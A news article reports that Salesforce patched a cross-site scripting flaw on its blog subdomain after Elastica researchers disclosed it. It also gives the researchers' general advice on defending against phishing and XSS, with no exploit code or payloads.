An injection vulnerability that could have opened the door to hackers has been patched by Salesforce after security researchers notified the company of their discovery. The vulnerability, which existed in a subdomain of the Salesforce.com cloud-based CRM platform, could have paved the way for phishing e-mails that looked legitimate because they would have appeared to come from within the application itself.
Salesforce told us in a statement today that it investigated and fixed "a minor vulnerability impacting the blog site 'admin.salesforce.com,' which is not connected to the Salesforce application or customer data." The company added, "We have no evidence of impact to Salesforce customers or their data."
The patch was validated on Monday by Elastica, the San Jose-based cloud application security company that first discovered the vulnerability in early July. The apparently trustworthy phishing e-mails that could have been enabled by the vulnerability could have tricked users into providing legitimate login credentials that could have then been exploited, according to Elastica.
XSS Exploitation 'Most Prolific' Hack
Researchers in Elastica's Cloud Threat Labs said they discovered the vulnerability in a Salesforce subdomain used for blogging. The cross-site scripting XSS flaw failed to properly filter input from a remote user as part of an HTTP request, which could have allowed hackers to "steal cookies and session identifiers, force users to visit phishing sites that extract credentials, and distribute malicious code to user machines."
"Exploitation of XSS vulnerabilities is among the most prolific methods of Web application hacking today," said Aditya Sood, lead architect at Elastica's Cloud Threat Labs. "Although this particular flaw was only present in a Salesforce subdomain, exploiting the trust of the company's primary domain could have allowed attackers to easily implement phishing attacks to gain access to user credentials. With stolen credentials, attackers can then access users' accounts and exfiltrate sensitive data undetected for long periods of time."
Elastica said when it first reported its discovery to Salesforce and provided details on how to fix the problem, the company responded that it considered the vulnerability to be "less severe" because it wasn't in the main domain, Salesforce.com, and could target only selected users. After receiving a follow-up e-mail from Elastica noting that the vulnerability had "the potential to be exploited in the wild," Salesforce then patched the flaw.
'Offensive' Strategies Against Social Engineering Attacks
We reached out to Elastica's Sood to learn more about what companies can do to protect themselves from XSS and similar vulnerabilities. He said companies should release patches as soon as possible after learning of such vulnerabilities to "reduce the window of exposure."
Companies should implement a "multi-dimensional security approach" and also be sure to educate their employees about safe surfing habits and the "perils of phishing attacks," Sood added. In addition, they should put in place security controls to require two-factor authentication on all end-user devices used to access their systems, he noted.
"Interestingly, organizations can follow an offensive approach to conduct controlled social engineering attacks, i.e., phishing attacks, to understand how the infrastructure control works and how users react to that attack," he said.
Image credit: iStock/Artist's concept .